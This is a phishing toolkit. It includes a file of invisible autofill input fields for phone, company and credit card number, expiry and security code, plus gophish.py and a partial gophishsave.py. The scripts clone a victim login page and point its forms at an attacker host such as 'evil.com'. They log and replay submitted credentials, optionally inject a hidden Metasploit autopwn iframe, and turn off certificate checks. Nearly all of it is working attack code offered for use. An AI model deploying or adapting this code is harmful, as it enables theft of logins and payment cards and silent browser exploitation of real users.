103 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="cell phone" x-autocompletetype="cell phone" id="cell phone" name="cell phone"/
104 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="phone" x-autocompletetype="phone" id="phone" name="phone"/
105 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="organization" x-autocompletetype="organization" id="organization" name="organization"/
106 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="company" x-autocompletetype="company" id="company" name="company"/
107 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="cc-number" x-autocompletetype="cc-number" id="cc-number" name="cc-number"/
108 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="cc-exp-month" x-autocompletetype="cc-exp-month" id="cc-exp-month" name="cc-exp-month"/
109 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="cc-exp" x-autocompletetype="cc-exp" id="cc-exp" name="cc-exp"/
110 | input type="text" style="font-size: 1px; opacity: 1.0; line-height: 0px; color: #fff; border: none; height: 0px; width: 0px;" autocomplete="cc-csc" x-autocompletetype="cc-csc" id="cc-csc" name="cc-csc"/
111 | 


--------------------------------------------------------------------------------
/gophish.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | import mechanize
  3 | import sys
  4 | import os
  5 | import cherrypy
  6 | import datetime
  7 | import argparse
  8 | import ssl
  9 | from bs4 import BeautifulSoup
 10 | 
 11 | # Build argument list for running the script
 12 | parser = argparse.ArgumentParser(prog='gophish.py', 
 13 | 	formatter_class=argparse.ArgumentDefaultsHelpFormatter,
 14 | 	description='Automatically setup a phishing site.',
 15 | 	epilog='Example: gophish.py --phish https://www.victim.com/login.php --replace https://www.evil.com --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt --sslkey ssl.key')
 16 | parser.add_argument('--phish', 
 17 | 	required=True,
 18 | 	help='the full URL to phish back to the victim (must include http(s)://)')
 19 | parser.add_argument('--replace', 
 20 | 	required=True,
 21 | 	help='the IP/FQDN to replace FORM actions with (must include http(s):// and final /)')
 22 | parser.add_argument('--logfile', 
 23 | 	default='phishlog.txt',
 24 | 	help='log file to store submitted form values')
 25 | parser.add_argument('--listen', 
 26 | 	default='0.0.0.0',
 27 | 	help='the IP to bind to')
 28 | parser.add_argument('--port', 
 29 | 	default=80,
 30 | 	type=int,
 31 | 	help='the port to start the listening web server on')
 32 | parser.add_argument('--ssl', 
 33 | 	action='store_const',
 34 | 	const=1,
 35 | 	default=1,
 36 | 	help='enable SSL on the running port')
 37 | parser.add_argument('--sslchain', 
 38 | 	default='chain.crt',
 39 | 	help='certificate chain file to use when ssl option is enabled')
 40 | parser.add_argument('--sslcert', 
 41 | 	default='ssl.crt',
 42 | 	help='certificate file to use to use when ssl option is enabled')
 43 | parser.add_argument('--sslkey', 
 44 | 	default='ssl.key',
 45 | 	help='private key file to use to use when ssl option is enabled')
 46 | parser.add_argument('--autopwn', 
 47 | 	help='Metasploit auxiliary/server/browser_autopwn URL to inject as an iFrame')
 48 | parser.add_argument('--autofill', 
 49 | 	help='file to use to autosubmit autocomplete fields')
 50 | parser.add_argument('--redirect', 
 51 | 	help='redirect requests for this address somewhere else')
 52 | parser.add_argument('--redirectto', 
 53 | 	default='www.google.com',
 54 | 	help='redirect requests in the redirect option to this address (full link, must include http(s)://)')
 55 | parser.add_argument('--landing', 
 56 | 	help='redirect to this landing page instead of original site after form is submitted (include full link)')
 57 | parser.add_argument('--clickthrough', 
 58 | 	help='file to serve up after user enters form credentials on main phish page')
 59 | parser.add_argument('--clickable', 
 60 | 	help='used in combination with clickthrough, comma separated list of files to serve based on requested name')
 61 | parser.add_argument('--useragent', 
 62 | 	help='file to use to pass a user agent value in the request')
 63 | parser.add_argument('--cookie', 
 64 | 	help='send a cookie or cookies in the request')
 65 | parser.add_argument('--sendcookies', 
 66 | 	action='store_const',
 67 | 	const=1,
 68 | 	default=1,
 69 | 	help='initiate a connection, get the cookies, send cookies back in second connection')
 70 | parser.add_argument('--proxy',
 71 |         default='noproxy',
 72 |         help='access the page to be phished via a proxy')
 73 | parser.add_argument('--proxyport',
 74 |         default='noproxy',
 75 |         help='proxy port')
 76 | parser.add_argument('--proxyuser',
 77 |         default='',
 78 |         help='username for the proxy')
 79 | parser.add_argument('--proxypass',
 80 |         default='',
 81 |         help='password for the proxy')
 82 | parser.set_defaults(logfile='phishlog.txt', listen='0.0.0.0', port=80, ssl=0, sslchain='chain.crt', sslcert='ssl.crt', sslkey='ssl.key', redirectto='www.google.com', sendcookie=0)
 83 | 
 84 | # Hold argument values in args
 85 | args = vars(parser.parse_args())
 86 | 
 87 | # Find necessary portions of phish target and attack target.
 88 | # This includes protocol (http or https), FQDN, and the URI for each
 89 | phishsource = args['phish']
 90 | phishhost = args['replace']
 91 | phishget = phishsource.rsplit('/', 1)[0]+'/'
 92 | htype = phishget.split(':', 1)[0]
 93 | stype = phishhost.split(':', 1)[0]
 94 | remhttp = phishget.split(':', 1)[1]
 95 | sremhttp = phishhost.split(':', 1)[1]
 96 | domainget = remhttp.split('/', 1)[1].split('/', 1)[1].split('/', 1)[0]
 97 | hostget = sremhttp.split('/', 1)[1].split('/', 1)[1].split('/', 1)[0]
 98 | faviconico = 'favicon.ico'
 99 | cherrylog = args['logfile']
100 | redirecte = ''
101 | redirectr = ''
102 | clickfiles = dict()
103 | proxy = args['proxy']
104 | proxyport = args['proxyport']
105 | proxyuser = args['proxyuser']
106 | proxypass = args['proxypass']
107 | proxycreds = ''
108 | 
109 | # Create a mechanized browser to connect to the phish target and grab the response
110 | browse = mechanize.Browser()
111 | browse.set_handle_robots(False)
112 | 
113 | # Disable certificate validation, mostly for if using a proxy
114 | try:
115 |   _create_unverified_https_context = ssl._create_unverified_context
116 | except AttributeError:
117 |   pass
118 | else:
119 |   ssl._create_default_https_context = _create_unverified_https_context
120 | 
121 | # Setup proxy if used
122 | if re.search('^noproxy', proxy) is None:
123 |   if re.search('[a-zA-Z0-9]', proxyuser) is not None and re.search('[a-zA-Z0-9]', proxyport) is not None:
124 |     proxycreds = proxyuser + ':' + proxypass + '@'
125 | 
126 |   if re.search('^noproxy', proxyport) is None:
127 |     browse.set_proxies({
128 |       "http" : proxycreds + proxy + ':' + proxyport,
129 |       "https" : proxycreds + proxy + ':' + proxyport,})
130 |   else:
131 |     browse.set_proxies({
132 |       "http" : proxycreds + proxy,
133 |       "https" : proxycreds + proxy,})
134 | 
135 |   if re.search('[a-zA-Z0-9]', proxyuser) is not None and re.search('[a-zA-Z0-9]', proxyport) is not None:
136 |     browse.add_proxy_password(proxyuser, proxypass)
137 | 
138 | # Determine if user agent was set,
139 | # if so then set argument, otherwise it is empty
140 | if args['useragent'] is not None:
141 |   uafile = open(args['useragent'], 'r')
142 |   uaheader = uafile.readline()
143 |   browse.addheaders = [('User-Agent', uaheader)]
144 |   uafile.close()
145 | 
146 | # if cookie option was set, then send the cookie in the connection
147 | if args['cookie'] is not None and args['useragent'] is not None:
148 |   browse.addheaders.append('Cookie', args['cookie'])
149 | elif args['cookie'] is not None:
150 |   browse.addheaders = [('Cookie', args['cookie'])]
151 | 
152 | # if sendcookies option was enabled, then connect,
153 | # grab the cookies, and use them in the second connection
154 | if args['sendcookies'] == 1:
155 |   cookies = mechanize.LWPCookieJar()
156 |   browse.set_cookiejar(cookies)
157 |   browse.open(phishsource)
158 | 
159 | # Write out the favicon
160 | try:
161 |   browse.open(faviconico)
162 |   favicodata = browse.response().read()
163 |   favicofile = open('favicon.ico', 'w')
164 |   favicofile.write(favicodata)
165 |   favicofile.close()
166 | except:
167 |   pass
168 | 
169 | browse.open(phishsource)
170 | phishpage = browse.response().read()
171 | browse.close()
172 | 
173 | # Use Beautiful soup to handle the HTML response
174 | soup = BeautifulSoup(phishpage, "lxml")
175 | 
176 | # If autopwn has been configured, implement functionality
177 | if args['autopwn'] is not None:
178 |   # First perform regex to make sure halfway proper link was submitted
179 |   if re.search('^(http|https)\:\/\/[a-zA-Z0-9]+', args['autopwn']):
180 |     # Build frame for HTML response and store in BeautifulSoup object
181 |     evilframe = '<iframe width="10" scrolling="no" height="1" frameborder="0" src="'+args['autopwn']+'" seamless="seamless">'
182 |     evilsoup = BeautifulSoup(evilframe)
183 | 
184 |     # Inject the evil frame into the original response
185 |     for tag in evilsoup.findAll('iframe'):
186 |       tag.extract()
187 |       soup.body.insert(len(soup.body.contents), tag)
188 | 
189 | # Determine if redirection is being used, 
190 | # if so then set arguments, otherwise they are empty
191 | if args['redirect'] is not None:
192 |   redirecte = args['redirect']
193 |   redirectr = args['redirectto']
194 | else:
195 |   redirecte = None
196 |   redirectr = None
197 | 
198 | # Determine if a landing page is being used, 
199 | # if so then set argument, otherwise it is empty
200 | if args['landing'] is not None:
201 |   landing = args['landing']
202 | else:
203 |   landing = None
204 | 
205 | # Determine if a clickthrough page is being used, 
206 | # if so then set argument, otherwise it is empty
207 | if args['clickthrough'] is not None:
208 |   clickthrough = args['clickthrough']
209 | 
210 |   # Check to see if a list of clickable files were provided.
211 |   # If so, assign them to clickfiles
212 |   if args['clickable'] is not None:
213 |     clickable = args['clickable'].split(',')
214 | 
215 |     for click in clickable:
216 |       clickfiles[click] = click
217 |       
218 |   else:
219 |     clickable = None
220 | else:
221 |   clickthrough = None
222 |   clickable = None
223 | 
224 | # Remove any javascript onsubmits that might interfere with the links
225 | for linkonsub in soup.find_all('a', {"onsubmit":True}):
226 |   linkonsub['onsubmit'] = ''
227 | 
228 | # Loop through all links found in HTML response, 
229 | # replace with full links back to phish host
230 | for link in soup.find_all('a'):
231 |   if link.get('href') is not None and re.search('^#', link.get('href')) is None:
232 |     if re.search('^javascript\:', link.get('href')) is None:
233 |       if re.search('^(mailto|http|https|//|#$)', link.get('href')) is None:
234 |         if re.search('^\/', link.get('href')):
235 |           link['href'] = htype+'://'+domainget+link.get('href')
236 |         else:
237 |           link['href'] = phishget+link.get('href')
238 |     else:
239 |       link['onclick'] = ''
240 | 
241 | # Loop through all images found in HTML response, 
242 | # replace with full link to image on phish host
243 | for img in soup.find_all('img'):
244 |   if img.get('src') is not None:
245 |     if re.search('^(http|https|//)', img.get('src')) is None:
246 |       if re.search('^\/', img.get('src')): 
247 |         img['src'] = htype+'://'+domainget+img.get('src')
248 |       else:
249 |         img['src'] = phishget+img.get('src')
250 | 
251 | # Loop through all style link tags found in HTML response, 
252 | # replace with full link to css file on phish host
253 | for styler in soup.find_all('link'):
254 |   if re.search('^(http|https|//)', styler.get('href')) is None:
255 |     if re.search('^\/', styler.get('href')):
256 |       styler['href'] = htype+'://'+domainget+styler.get('href')
257 |     else:
258 |       styler['href'] = phishget+styler.get('href')
259 | 
260 | # Loop through all script tags found in HTML response, 
261 | # replace with full link to script on phish host
262 | for scripter in soup.find_all('script', {"src":True}):
263 |   if re.search('^(http|https|//)', scripter.get('src')) is None:
264 |     if re.search('^\/', scripter.get('src')): 
265 |       scripter['src'] = htype+'://'+domainget+scripter.get('src')
266 |     else:
267 |       scripter['src'] = phishget+scripter.get('src')
268 | 
269 | # Loop through all embed tags found in HTML response, 
270 | # replace with full link to script on phish host
271 | for embedded in soup.find_all('embed', {"src":True}):
272 |   if re.search('^(http|https|//)', embedded.get('src')) is None:
273 |     if re.search('^\/', embedded.get('src')): 
274 |       embedded['src'] = htype+'://'+domainget+embedded.get('src')
275 |     else:
276 |       embedded['src'] = phishget+embedded.get('src')
277 | 
278 | # Loop through all param tags found in HTML response, 
279 | # replace with full link to script on phish host
280 | for paramval in soup.find_all('param', {"value":True}):
281 |   if re.search('^(http|https|//)', paramval.get('value')) is None:
282 |     if re.search('^\/', paramval.get('value')): 
283 |       paramval['src'] = htype+'://'+domainget+paramval.get('value')
284 |     else:
285 |       paramval['src'] = phishget+paramval.get('value')
286 | 
287 | # Loop through all meta tags found in HTML response, 
288 | # replace with full link to phish host
289 | for meta in soup.find_all('meta', {"content":True}):
290 |   if re.search('^(http|https|//)', meta.get('content')) is None:
291 |     if re.search('^\/', meta.get('content')) and re.search('\.', meta.get('content')): 
292 |       meta['content'] = htype+'://'+domainget+meta.get('content')
293 |     elif re.search('\.', meta.get('content')):
294 |       meta['content'] = phishget+meta.get('content')
295 | 
296 | # Remove any javascript onsubmits that might interfere with the input
297 | for inputonsub in soup.find_all('input', {"onsubmit":True}):
298 |   inputonsub['onsubmit'] = ''
299 | 
300 | # Remove any javascript onclicks that might interfere with the input
301 | for inputonclick in soup.find_all('input', {"onclick":True}):
302 |   inputonclick['onclick'] = ''
303 | 
304 | # Remove any javascript onkeypresses that might interfere with the input
305 | for inputkeypress in soup.find_all('input', {"onkeypress":True}):
306 |   inputkeypress['onkeypress'] = ''
307 | 
308 | # Loop through all input tags found in HTML response, 
309 | # replace src with full link to script on phish host
310 | for inputer in soup.find_all('input', {"src":True}):
311 |   if re.search('^(http|https|//)', inputer.get('src')) is None:
312 |     if re.search('^\/', inputer.get('src')): 
313 |       inputer['src'] = htype+'://'+domainget+inputer.get('src')
314 |     else:
315 |       inputer['src'] = phishget+inputer.get('src')
316 | 
317 | # Remove any javascript onclicks that might interfere with the form
318 | for formonclick in soup.find_all('form', {"onclick":True}):
319 |   formonclick['onclick'] = ''
320 | 
321 | # Remove any javascript onkeypresses that might interfere with the form
322 | for formkeypress in soup.find_all('form', {"onkeypress":True}):
323 |   formkeypress['onkeypress'] = ''
324 | 
325 | # Loop through all forms found in HTML response, 
326 | # replace action with our attacking system
327 | for form in soup.find_all('form'):
328 |   if re.search('^(http|https|//)', form.get('action')) is None:
329 |     if re.search('^\/', form.get('action')): 
330 |       form['action'] = stype+'://'+hostget+form.get('action')
331 |     else:
332 |       form['action'] = stype+'://'+hostget+'/'+form.get('action')
333 |   else:
334 |     form['action'] = stype+'://'+hostget+'/'+form.get('action').split('/', 1)[1].split('/', 1)[1].split('/', 1)[1]
335 | 
336 |   # If the autofill feature was enabled, then open the autofill file
337 |   # and inject each hidden autofill input type into the form
338 |   if args['autofill'] is not None:
339 |     autofile = open(args['autofill'], 'r')
340 | 
341 |     for line in autofile:
342 |       if re.match('^#', line) is None:
343 |         autoform = soup.new_tag(line)
344 |         form.insert(0, autoform)
345 | 
346 |     autofile.close()
347 | 
348 | # Function for logging URL/File accessed and submitted form values
349 | def logArgs(linkArgs, postArgs):
350 |   indexList = ''
351 |   formList = ''
352 |   argTrue = False
353 |   phishLog = open(cherrylog, 'a')
354 | 
355 |   # For all submitted form values, store in variable and
356 |   # create form input values to be autosubmitted to the real site
357 |   for key, value in postArgs.items():
358 |     indexList = indexList+str(key)+' => '+str(value)+', '
359 |     formList += '<input type="hidden" name="'+str(key)+'" value="'+str(value)+'"/>'
360 |     argTrue = True
361 | 
362 |   # If there were arguments, log the data
363 |   if argTrue:
364 |     logTime = str(datetime.datetime.now())
365 |     phishLog.write(logTime+': Redirect access, '+indexList[:-2]+'\n')
366 | 
367 |   phishLog.close()
368 |   return formList
369 | 
370 | phishHtml = soup.prettify(formatter="html")
371 | 
372 | # BeautifulSoup fixes broken HTML, I do not want this to happen for &amp;
373 | phishHtml = re.sub('&amp;', '&', phishHtml)
374 | 
375 | # Rewrite CSS url(), first look for all matches
376 | urlCSS = re.findall(r'url\((.*)\)', phishHtml)
377 | 
378 | # Loop through matches and replace
379 | for urls in urlCSS:
380 |   if re.search('\)', urls):
381 |     urls = urls.split(')')[0]
382 | 
383 |   checkQuotes = re.search('(\'|\")', urls)
384 |   urlValue = ''
385 |   useQuotes = ''
386 | 
387 |   # If quotes were used, remove the as part of the string
388 |   # but add them around the URL
389 |   if checkQuotes is not None:
390 |     urlValue = str(urls)[1:-1]
391 |     useQuotes = '"'
392 |   else:
393 |     urlValue = str(urls)
394 |   
395 |   # If preceeded by a forward slash, remove make sure we do not double slash
396 |   if re.search('^(http|https|//)', urls) is not None:
397 |     if re.search('^\/', urls):
398 |       phishHtml = re.sub('url\('+str(urls)+'\)', 'url('+useQuotes+phishget[:-1]+urlValue+useQuotes+')', phishHtml)
399 |     else:
400 |       phishHtml = re.sub('url\('+str(urls)+'\)', 'url('+useQuotes+phishget+urlValue+useQuotes+')', phishHtml)
401 | 
402 | # Object for running cherrypy
403 | class PhishForm(object):
404 |   @cherrypy.expose
405 | 
406 |   # handler for all requests
407 |   def default(self,*args,**kwargs):
408 |     self.args = args
409 |     self.kwargs = kwargs
410 |     argTrue = False
411 | 
412 |     # If redirection is in use, log all submitted values then redirect
413 |     if redirecte is not None and redirectr is not None and re.match(redirecte, cherrypy.request.headers['Host']):
414 |       logArgs(self.args, self.kwargs)
415 |       raise cherrypy.HTTPRedirect(redirectr, 302)
416 | 
417 |     # Check referer, if submitted to us AND from us
418 |     # then time to redirect to landing or original page
419 |     if re.match('^'+phishhost, cherrypy.request.headers.get("Referer", "/")):
420 |       formList = logArgs(self.args, self.kwargs)
421 | 
422 |       # If there was submitted data, then formList should have been built with input tags
423 |       if re.match('\<input\stype', formList) or clickfiles[cherrypy.url().split('/')[len(cherrypy.url().split('/'))-1]] is not None:
424 | 
425 |         # If landing was configured, redirect to it
426 |         if landing is not None:
427 |           raise cherrypy.HTTPRedirect(landing, 302)
428 |         elif clickthrough is not None:
429 | 
430 |           # If clickable files were created, loop through and compare
431 |           if clickable is not None:
432 |             clickmatch = False
433 |             clickurl = ''
434 |             clickname = ''
435 | 
436 |             # For each clickable file, compare against what was submitted,
437 |             # and if a match is found return it
438 |             for file in clickfiles:
439 | 
440 |               # If the file matches the url, then load and send
441 |               if re.match(phishhost+file, cherrypy.url()):
442 |                 clickmatch = True
443 | 
444 |                 # If it is an htm(l) file, then read as ascii, otherwise binary
445 |                 if re.match('ht(m|ml)', file.split('.')[1]):
446 |                   clickdata = open(clickfiles[file], 'r')
447 |                   clickurl = clickdata.readlines()
448 |                   clickdata.close()
449 |                 else:
450 |                   clickdata = open(clickfiles[file], 'rb')
451 |                   clickurl = clickdata.readlines()
452 |                   clickdata.close()
453 | 
454 |                 clickname = file
455 | 
456 |             # If a clickable file was matched, return in response,
457 |             # otherwise return clickthrough file
458 |             if clickmatch == True:
459 | 
460 |               # If this was an htm(l) file, then return, otherwise
461 |               # send as file object
462 |               if re.match('ht(m|ml)', clickname.split('.')[1]):
463 |                 return clickurl
464 |               else:
465 |                 cherrypy.response.headers["Content-Type"] = "application/x-download"
466 |                 cherrypy.response.headers["Content-Disposition"] = 'attachment; filename='+clickname
467 |                 return clickurl
468 |             else:
469 |               pagedata = open(clickthrough, 'r')
470 |               clickpage = pagedata.readlines()
471 |               pagedata.close()
472 |               return clickpage
473 | 
474 |           # If no clickable files were created, then return clickthrough file
475 |           else:
476 |             pagedata = open(clickthrough, 'r')
477 |             clickpage = pagedata.readlines()
478 |             pagedata.close()
479 |             return clickpage
480 |         else:
481 |           methodType = 'POST'
482 | 
483 |           # If form was submitted via a GET request, build HTML form using GET, otherwise POST
484 |           # Set the form to autopost with POST/GET.
485 |           if re.search('^GET$', cherrypy.request.method):
486 |             methodType = 'GET'
487 | 
488 |           postFormPhish = '<html><head></head><body onload="javascript:sendForms()"><script language="JavaScript">function sendForms(){ document.forms[0].submit(); }</script><form method="'+methodType+'" name="form0" action="'+htype+'://'+domainget+cherrypy.request.path_info+'">'+formList+'</form></body></html>'
489 |           postsoup = BeautifulSoup(postFormPhish)
490 |           postFormHtml = postsoup.prettify("iso-8859-1")
491 |           return postFormHtml
492 |       else:
493 |         # Log any submitted arguments and return the original phish page
494 |         logArgs(self.args, self.kwargs)
495 |         return phishHtml.encode('utf-8').strip()
496 |     else:
497 |       # Log any submitted arguments and return the original phish page
498 |       logArgs(self.args, self.kwargs)
499 |       return phishHtml.encode('utf-8').strip()
500 | 
501 | # Configure cherrypy to bind to specified IP or default
502 | cherrypy.server.socket_host = args['listen']
503 | 
504 | # If the SSL option was enabled, configure cherrypy to run over HTTPS
505 | # using the correct certs, keys, and sslchain
506 | if args['ssl'] == 1:
507 |   cherrypy.server.ssl_module = 'builtin'
508 |   cherrypy.server.ssl_certificate = args['sslcert']
509 |   cherrypy.server.ssl_private_key = args['sslkey']
510 |   cherrypy.server.ssl_certificate_chain = args['sslchain']
511 | 
512 | # Run cherrypy on the specified port or the default if not specified
513 | cherrypy.server.socket_port = int(args['port'])
514 | cherrypy.quickstart(PhishForm(), '/', config = { '/favicon.ico' : { 'tools.staticfile.on': True, 'tools.staticfile.filename': os.getcwd() + '/favicon.ico' }})


--------------------------------------------------------------------------------
/gophishsave.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | import mechanize
  3 | import sys
  4 | import cherrypy
  5 | import datetime
  6 | import argparse
  7 | import ssl
  8 | from bs4 import BeautifulSoup
  9 | 
 10 | # Build argument list for running the script
 11 | parser = argparse.ArgumentParser(prog='gophish.py', 
 12 | 	formatter_class=argparse.ArgumentDefaultsHelpFormatter,
 13 | 	description='Download and replace values in a site\'s HTML to setup a phishing site.',
 14 | 	epilog='Example: gophish.py --phish https://www.victim.com/login.php --replace https://www.evil.com --outfile victim.html')
 15 | parser.add_argument('--phish', 
 16 | 	required=True,
 17 | 	help='the full URL to phish back to the victim (must include http(s)://)')
 18 | parser.add_argument('--replace', 
 19 | 	required=True,
 20 | 	help='the IP/FQDN to replace FORM actions with (must include http(s):// and final /)')
 21 | parser.add_argument('--outfile', 
 22 | 	default='phishlog.txt',
 23 | 	help='log file to store submitted form values')
 24 | parser.add_argument('--autopwn', 
 25 | 	help='Metasploit auxiliary/server/browser_autopwn URL to inject as an iFrame')
 26 | parser.add_argument('--autofill', 
 27 | 	help='file to use to autosubmit autocomplete fields')
 28 | parser.add_argument('--useragent', 
 29 | 	help='file to use to pass a user agent value in the request')
 30 | parser.add_argument('--cookie', 
 31 | 	help='send a cookie or cookies in the request')
 32 | parser.add_argument('--sendcookies', 
 33 | 	action='store_const',
 34 | 	const=1,
 35 | 	default=1,
 36 | 	help='initiate a connection, get the cookies, send cookies back in second connection')
 37 | parser.add_argument('--proxy',
 38 |         default='noproxy',
 39 |         help='access the page to be phished via a proxy')
 40 | parser.add_argument('--proxyport',
 41 |         default='noproxy',
 42 |         help='proxy port')
 43 | parser.add_argument('--proxyuser',
 44 |         default='',
 45 |         help='username for the proxy')
 46 | parser.add_argument('--proxypass',
 47 |         default='',
 48 |         help='password for the proxy')
 49 | parser.set_defaults(logfile='phish.html', sendcookie=0)
 50 | 
 51 | # Hold argument values in args
 52 | args = vars(parser.parse_args())
 53 | 
 54 | # Find necessary portions of phish target and attack target.
 55 | # This includes protocol (http or https), FQDN, and the URI for each
 56 | phishsource = args['phish']
 57 | phishhost = args['replace']
 58 | phishget = phishsource.rsplit('/', 1)[0]+'/'
 59 | htype = phishget.split(':', 1)[0]
 60 | stype = phishhost.split(':', 1)[0]
 61 | remhttp = phishget.split(':', 1)[1]
 62 | sremhttp = phishhost.split(':', 1)[1]
 63 | domainget = remhttp.split('/', 1)[1].split('/', 1)[1].split('/', 1)[0]
 64 | hostget = sremhttp.split('/', 1)[1].split('/', 1)[1].split('/', 1)[0]
 65 | phishfile = args['outfile']
 66 | redirecte = ''
 67 | redirectr = ''
 68 | clickfiles = dict()
 69 | proxy = args['proxy']
 70 | proxyport = args['proxyport']
 71 | proxyuser = args['proxyuser']
 72 | proxypass = args['proxypass']
 73 | proxycreds = ''
 74 | 
 75 | # Create a mechanized browser to connect to the phish target and grab the response
 76 | browse = mechanize.Browser()
 77 | browse.set_handle_robots(False)
 78 | 
 79 | # Disable certificate validation, mostly for if using a proxy
 80 | try:
 81 |   _create_unverified_https_context = ssl._create_unverified_context
 82 | except AttributeError:
 83 |   pass
 84 | else:
 85 |   ssl._create_default_https_context = _create_unverified_https_context
 86 | 
 87 | # Setup proxy if used
 88 | if re.search('^noproxy', proxy) is None:
 89 |   if re.search('[a-zA-Z0-9]', proxyuser) is not None and re.search('[a-zA-Z0-9]', proxyport) is not None:
 90 |     proxycreds = proxyuser + ':' + proxypass + '@'
 91 | 
 92 |   if re.search('^noproxy', proxyport) is None:
 93 |     browse.set_proxies({
 94 |       "http" : proxycreds + proxy + ':' + proxyport,
 95 |       "https" : proxycreds + proxy + ':' + proxyport,})
 96 |   else:
 97 |     browse.set_proxies({
 98 |       "http" : proxycreds + proxy,
 99 |       "https" : proxycreds + proxy,})
100 | 
101 |   if re.search('[a-zA-Z0-9]', proxyuser) is not None and re.search('[a-zA-Z0-9]', proxyport) is not None:
102 |     browse.add_proxy_password(proxyuser, proxypass)
103 | 
104 | # Determine if user agent was set,
105 | # if so then set argument, otherwise it is empty
106 | if args['useragent'] is not None:
107 |   uafile = open(args['useragent'], 'r')
108 |   uaheader = uafile.readline()
109 |   browse.addheaders = [('User-Agent', uaheader)]
110 |   uafile.close()
111 | 
112 | # if cookie option was set, then send the cookie in the connection
113 | if args['cookie'] is not None and args['useragent'] is not None:
114 |   browse.addheaders.append('Cookie', args['cookie'])
115 | elif args['cookie'] is not None:
116 |   browse.addheaders = [('Cookie', args['cookie'])]
117 | 
118 | # if sendcookies option was enabled, then connect,
119 | # grab the cookies, and use them in the second connection
120 | if args['sendcookies'] == 1:
121 |   cookies = mechanize.LWPCookieJar()
122 |   browse.set_cookiejar(cookies)
123 |   browse.open(phishsource)
124 | 
125 | browse.open(phishsource)
126 | phishpage = browse.response().read()
127 | browse.close()
128 | 
129 | # Use Beautiful soup to handle the HTML response
130 | soup = BeautifulSoup(phishpage, "lxml")
131 | 
132 | # If autopwn has been configured, implement functionality
133 | if args['autopwn'] is not None:
134 |   # First perform regex to make sure halfway proper link was submitted
135 |   if re.search('^(http|https)\:\/\/[a-zA-Z0-9]+', args['autopwn']):
136 |     # Build frame for HTML response and store in BeautifulSoup object
137 |     evilframe = '<iframe width="10" scrolling="no" height="1" frameborder="0" src="'+args['autopwn']+'" seamless="seamless">'
138 |     evilsoup = BeautifulSoup(evilframe)
139 | 
140 |     # Inject the evil frame into the original response
141 |     for tag in evilsoup.findAll('iframe'):
142 |       tag.extract()
143 |       soup.body.insert(len(soup.body.contents), tag)
144 | 
145 | # Remove any javascript onsubmits that might interfere with the links
146 | for linkonsub in soup.find_all('a', {"onsubmit":True}):
147 |   linkonsub['onsubmit'] = ''
148 | 
149 | # Loop through all links found in HTML response, 
150 | # replace with full links back to phish host
151 | for link in soup.find_all('a'):
152 |   if link.get('href') is not None and re.search('^#', link.get('href')) is None:
153 |     if re.search('^javascript\:', link.get('href')) is None:
154 |       if re.search('^(mailto|http|https|//|#$)', link.get('href')) is None:
155 |         if re.search('^\/', link.get('href')):  
156 |           link['href'] = htype+'://'+domainget+link.get('href')
157 |         else:
158 |           link['href'] = phishget+link.get('href')
159 |     else:
160 |       link['onclick'] = ''
161 | 
162 | # Loop through all images found in HTML response, 
163 | # replace with full link to image on phish host
164 | for img in soup.find_all('img'):
165 |   if img.get('src') is not None:
166 |     if re.search('^(http|https|//)', img.get('src')) is None:
167 |       if re.search('^\/', img.get('src')): 
168 |         img['src'] = htype+'://'+domainget+img.get('src')
169 |       else:
170 |         img['src'] = phishget+img.get('src')
171 | 
172 | # Loop through all style link tags found in HTML response, 
173 | # replace with full link to css file on phish host
174 | for styler in soup.find_all('link'):
175 |   if re.search('^(http|https|//)', styler.get('href')) is None:
176 |     if re.search('^\/', styler.get('href')):
177 |       styler['href'] = htype+'://'+domainget+styler.get('href')
178 |     else:
179 |       styler['href'] = phishget+styler.get('href')
180 | 
181 | # Loop through all script tags found in HTML response, 
182 | # replace with full link to script on phish host
183 | for scripter in soup.find_all('script', {"src":True}):
184 |   if re.search('^(http|https|//)', scripter.get('src')) is None:
185 |     if re.search('^\/', scripter.get('src')): 
186 |       scripter['src'] = htype+'://'+domainget+scripter.get('src')
187 |     else:
188 |       scripter['src'] = phishget+scripter.get('src')
189 | 
190 | # Loop through all embed tags found in HTML response, 
191 | # replace with full link to script on phish host
192 | for embedded in soup.find_all('embed', {"src":True}):
193 |   if re.search('^(http|https|//)', embedded.get('src')) is None:
194 |     if re.search('^\/', embedded.get('src')): 
195 |       embedded['src'] = htype+'://'+domainget+embedded.get('src')
196 |     else:
197 |       embedded['src'] = phishget+embedded.get('src')
198 | 
199 | # Loop through all param tags found in HTML response, 
200 | # replace with full link to script on phish host
201 | for paramval in soup.find_all('param', {"value":True}):
202 |   if re.search('^(http|https|//)', paramval.get('value')) is None:
203 |     if re.search('^\/', paramval.get('value')): 
204 |       paramval['src'] = htype+'://'+domainget+paramval.get('value')
205 |     else:
206 |       paramval['src'] = phishget+paramval.get('value')
207 | 
208 | # Loop through all meta tags found in HTML response, 
209 | # replace with full link to phish host
210 | for meta in soup.find_all('meta', {"content":True}):
211 |   if re.search('^(http|https|//)', meta.get('content')) is None:
212 |     if re.search('^\/', meta.get('content')) and re.search('\.', meta.get('content')): 
213 |       meta['content'] = htype+'://'+domainget+meta.get('content')
214 |     elif re.search('\.', meta.get('content')):
215 |       meta['content'] = phishget+meta.get('content')
216 | 
217 | # Remove any javascript onsubmits that might interfere with the input
218 | for inputonsub in soup.find_all('input', {"onsubmit":True}):
219 |   inputonsub['onsubmit'] = ''
220 | 
221 | # Remove any javascript onclicks that might interfere with the input
222 | for inputonclick in soup.find_all('input', {"onclick":True}):
223 |   inputonclick['onclick'] = ''
224 | 
225 | # Remove any javascript onkeypresses that might interfere with the input
226 | for inputkeypress in soup.find_all('input', {"onkeypress":True}):
